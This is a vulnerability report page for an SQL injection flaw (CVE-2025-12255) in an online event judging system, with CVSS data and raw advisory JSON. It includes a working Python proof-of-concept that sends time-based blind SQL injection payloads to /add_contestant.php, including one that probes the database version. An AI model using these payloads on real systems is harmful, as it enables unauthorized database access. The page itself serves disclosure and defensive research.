Security Vulnerability Report
中文
CVE-2025-12255 CVSS 6.3 MEDIUM

CVE-2025-12255

Published: 2025-10-27 09:15:38
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A security flaw has been discovered in code-projects Online Event Judging System 1.0. This affects an unknown part of the file /add_contestant.php. Performing manipulation of the argument fullname results in sql injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:carmelo:online_event_judging_system:1.0:*:*:*:*:*:*:* - VULNERABLE
code-projects Online Event Judging System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-12255 SQL Injection PoC # Target: code-projects Online Event Judging System 1.0 # Vulnerability: SQL Injection in /add_contestant.php via fullname parameter def exploit_sqli(target_url): """ SQL Injection exploit for CVE-2025-12255 This PoC demonstrates time-based blind SQL injection """ # Target endpoint endpoint = f"{target_url}/add_contestant.php" # Payload for time-based blind SQL injection # This payload causes a 5-second delay if vulnerable # Using CASE WHEN condition THEN (SELECT...SLEEP(5)) ELSE 0 END pattern payload = "admin' AND (SELECT CASE WHEN (1=1) THEN (SELECT 1 FROM (SELECT SLEEP(5))x) ELSE 0 END) AND '1'='1" # Data to be sent data = { 'fullname': payload, 'submit': 'Add Contestant' } print(f"[*] Target: {endpoint}") print(f"[*] Payload: {payload}") try: print("[*] Sending malicious request...") response = requests.post(endpoint, data=data, timeout=15) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed! Time-based blind SQL injection works.") print(f"[+] Response time: {response.elapsed.total_seconds()}s") return True else: print("[-] Target may not be vulnerable or payload needs adjustment") return False except requests.exceptions.Timeout: print("[+] Vulnerability confirmed! Request timed out as expected.") return True except Exception as e: print(f"[-] Error: {str(e)}") return False def extract_data(target_url): """ Example: Extract database version using blind SQL injection """ # Database version extraction payload version_payload = "admin' AND (SELECT CASE WHEN (SUBSTRING(@@version,1,1)='5') THEN (SELECT 1 FROM (SELECT SLEEP(3))x) ELSE 0 END) AND '1'='1" print(f"[*] Extracting database information...") print(f"[*] Testing if MySQL version starts with '5'...") # Implementation would iterate through characters # This is a simplified demonstration print("[*] Use sqlmap or similar tool for comprehensive exploitation") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-12255.py <target_url>") print("Example: python cve-2025-12255.py http://localhost/online-event-judging-system") sys.exit(1) target = sys.argv[1].rstrip('/') exploit_sqli(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12255", "sourceIdentifier": "[email protected]", "published": "2025-10-27T09:15:37.590", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in code-projects Online Event Judging System 1.0. This affects an unknown part of the file /add_contestant.php. Performing manipulation of the argument fullname results in sql injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:carmelo:online_event_judging_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9FE35151-38A0-407C-A81B-14BA65BD9F8F"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/zzonce/cve/issues/3", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.329926", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329926", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.674006", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.